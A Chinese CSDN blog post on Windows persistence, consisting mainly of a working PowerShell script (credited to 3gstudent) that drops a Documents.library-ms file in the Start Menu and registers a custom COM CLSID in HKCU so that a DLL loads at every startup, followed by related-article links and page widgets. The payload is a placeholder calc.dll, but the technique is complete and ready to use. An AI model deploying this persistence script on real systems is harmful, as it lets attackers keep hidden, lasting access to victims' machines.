Library-Files-维持权限--对比自带CLSID打开程序

最新推荐文章于 2021-08-27 14:21:29 发布
最新推荐文章于 2021-08-27 14:21:29 发布
阅读量258 收藏
点赞数
分类专栏: 安全相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZCMUCZX/article/details/102212963
版权
简单介绍下库的概念

库是用户定义的用户的内容的逻辑表示的文件夹集合。 通过在库中包括文件夹,用户告知 Windows 他或她的重要数据的位置。 系统将索引启用快速搜索和 Windows 资源管理器中的功能根据文件属性和元数据更丰富查看排列在这些文件夹,库描述保存在磁盘 %appdata%\Microsoft\Windows\Libraries 文件夹

下面是3g老师的代码
function Invoke-LibraryFilesPersistence
{ 
<#
.SYNOPSIS
First modify the registry and then create a file named Documents.library-ms in %appdata%\Microsoft\Windows\Start Menu\Programs\Accessories.
It'll load c:\test\calc.dll on start-up.
Author: 3gstudent
Reference:
https://www.countercept.com/blog/abusing-windows-library-files-for-persistence/
#>
$clsid = "{11111111-1111-1111-1111-111111111111}"
$outpath = $env:appdata+"\Microsoft\Windows\Start Menu\Programs\Accessories\"+"Documents.library-ms"
$payload = "c:\test\calc.dll"
$xml = @"
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@shell32.dll,-34575</name>
<ownerSID></ownerSID>
<version>6</version>
#islibrarypinned关闭了,那么左侧相应的Library就不会被固定住
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1002</iconReference>
<templateInfo>
#文件资料夹 {7D49D726-3C21-4F05-99AA-FDC2C9474656}
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription publisher="Microsoft" product="Windows">
<description>@shell32.dll,-34577</description>
<isDefaultNonOwnerSaveLocation>true</isDefaultNonOwnerSaveLocation>
<isSearchOnlyItem>true</isSearchOnlyItem>
<simpleLocation>
#此处指示的打开方式和win+R方式通过指定控制面板的CLSID是一样的,这话CLSID是我们自己添加的com对象
<url>shell:::$clsid</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"@
$xml| Out-File $outpath -encoding utf8
$RegKey = "HKCU:\Software\Classes\CLSID\$clsid\"
New-Item -type Directory $RegKey
New-Item -type Directory $RegKey"InProcServer32"
New-Item -type Directory $RegKey"ShellFolder"
New-ItemProperty -path $RegKey"InProcServer32" -name "(default)" -value $payload -propertyType string
New-ItemProperty $RegKey"InProcServer32" -name "ThreadingModel" -value "Apartment" -propertyType string
New-ItemProperty $RegKey"ShellFolder" -name "Attributes" -value 0xf090013d -propertyType dword
}
Invoke-LibraryFilesPersistence

在这里插入图片描述

比如下面运行,就是通过shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}可以打开所有控制面板

在这里插入图片描述

rv0p111
关注
专栏目录
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 886
权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
检索COM类工厂中CLSID为{96749377-3391-11D2-9EE3-00C04F797396}的组件失败,解决办法
07-28
检索COM类工厂中CLSID为{96749377-3391-11D2-9EE3-00C04F797396}的组件失败,没有注册类问题分析和解决办法 错误提示:Retrieving the ...
Microsoft Windows library files
x_xx_xxx_xxxx的博客
06-21 689
参考自: 维基百科  https://en.wikipedia.org/wiki/Microsoft_Windows_library_filesMicrosoft Windows library filesFrom Wikipedia, thefree encyclopediaJump to navigationJump to search hideThis article has multip...
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2411
小结下权限维持方法
MFC---ActiveX控件编程基础
XingyuZhengtu的博客
07-23 742
关注微信公众号“二进制小站”~~获取更多分析~~(文末二维码~~) 原文地址:https://blog.csdn.net/longhuahaha/article/details/8556964 1.ActiveX的基本概念 ActiveX控件可以看作是一个极小的服务器应用程序,它不能独立运行,必须嵌入到某个容器程序中,与该容器一起运行。这个容器包括WEB网页,应用程序窗体等。。。 Ac...
制作自己的特色PE----Mr.Zhang
weixin_33859231的博客
06-19 455
必备的文件和工具 win7.iso/win8.iso Windows系统ISO镜像 WimTool BOOT.WIM文件的改动 RegWorkShop 注冊表编辑和分析利器 UltraISO 改动win7.iso/win8.iso 关于系统镜...
MFC-ActiveX
xuwentao37x的专栏
06-05 544
1.ActiveX的基本概念          ActiveX控件可以看作是一个极小的服务器应用程序,它不能独立运行,必须嵌入到某个容器程序中,与该容器一起运行。这个容器包括WEB网页,应用程序窗体等。。。          ActiveX控件的后缀名是OCX或者DLL。一般是以OCX和动态库共存的形式打包成cab或者exe的文件放在服务器上,客户端下载后运行安装cab或exe解压成O
远控免杀专题(67)-白名单(113个)总结篇
Ms08067安全实验室
05-25 8740
关于白名单程序相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称“Living-Off-the-Land Binaries”,直白翻译为“生活...
商业编程-源码-使用DirectSound播放wave文件的程序代码.zip
06-23
DirectSound是微软Windows API的一部分,主要用于游戏和其他对音频性能有高要求的应用程序。它提供了低级的音频控制,包括硬件加速、3D音效和直接访问音频硬件的能力。在这个压缩包中,我们有一个使用DirectSound...
对象的前期绑定与后期绑定使用方法(CLSID-ProgID对照)-64bit-install.xls
08-22
excle vba获取系统中可用引用对象,包括CLSID PROGID 以及64BIT版本OFFICE的设置
增值税管理系统-百望接口.pdf
03-27
对于本地ActiveX组件调用,文档指出组件文件名为NISEC_SKSCX.ocx,其全局唯一标识符(GUID)为CLASSID="clsid: 003BD8F2-A6C3-48EF-9B72-ECFD8FC4D49F"。调用函数Operate()接收一个输入XML信息sInputInfo,返回结果...
down.rar_QSerialPort_QT 串口通信_qt down-arrow_qt word_qt 串口 excel
07-15
在本文中,我们将深入探讨如何使用QT框架进行串口通信,以及如何利用QT与Microsoft Office应用程序,如Word和Excel,进行交互。QT是一个强大的跨平台应用开发框架,它提供了丰富的库和工具,使得开发者能够轻松地...
最低权限: 让您的应用程序更好地适应 Windows Vista 的用户帐户控制
int_tulip的专栏
05-29 1208
在过去的一年中,我与太多的开发人员有过合作的经历,他们最初对用户帐户控制 (UAC) 的工作方式会怀有疑问,而最终又得以理解,这历历在目的过往情节交织在一起,使 UAC 像一团巨大的迷雾。诚然,毫无疑问的是,学习如何编写适用于标准用户的优秀应用程序是要费些功夫,但这方面的知识会令您在 Windows® 程序员之路上更进一步。本文的目的是通过一些必要的说明,为您开辟一条捷径。 UAC 是 Micr
恶意软件分析笔记V0.1(持续更新)
欢迎!欢迎来到17号城市!
08-27 2396
文章目录恶意软件分析恶意软件能做什么恶意代码类型1. 基础静态分析反病毒引擎扫描【工具】恶意代码的指纹`查找字符串【工具】`加壳PEiD【工具】PE文件格式文件头 PE header`DLL文件结构`DLL表分节(Section)`.text(代码段)`.rdata(数据段)`.data(数据段)`.idata(数据段).edata(数据段).rsrc.reloc未整理PE View【工具】PE Studio【工具】PE Viewer【工具】Resource Hacker【工具】链接库与函数`DLL文件`静
基于rpc调用-动态加载ssp
rv0p111
10-08 3216
此篇文章结合学到的知识做个总结 微软有个api为AddSecurityPackage,可以添加ssp,这里就看下其的实现逻辑,这里从将从公开这个 API 的 secur32.dll 这个 DLL 文件开始,主要为本人进行了修改以及自己去复现的总结 在 Ghidra 打开这个 DLL 文件,这实际上只是一个调用 sspcli.dll 的包装器 我们这边主要是看sspicli.dll的实现逻辑是...
reGeorg的工具原理
rv0p111
09-30 2891
首先先创建一个socket去运行,去连接想要连接的端口 reGeorgSocksProxy客户端与服务端的通讯是基于session来区分的,并不支持在指定的session下进行 socket_set_nonblock 设置socket为非阻塞 ob_end_clean()时缓冲区内容将被丢弃 socket_write($socket参数1,$msg参数2,$strlen参数3)     作用:把数...
CLSID:{91C407BA-9314-4050-BE48-1287439D6963}
最新发布
11-01
很抱歉,根据提供的引用内容,我无法回答关于CLSID:{91C407BA-9314-4050-BE48-1287439D6963}的问题。引用内容中提到的是关于CLSID为{B9425246-4131-11D2-BE48-004005A04EDF}的组件失败的问题和权限设置的内容。如果您有其他问题,请告诉我,我会尽力回答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值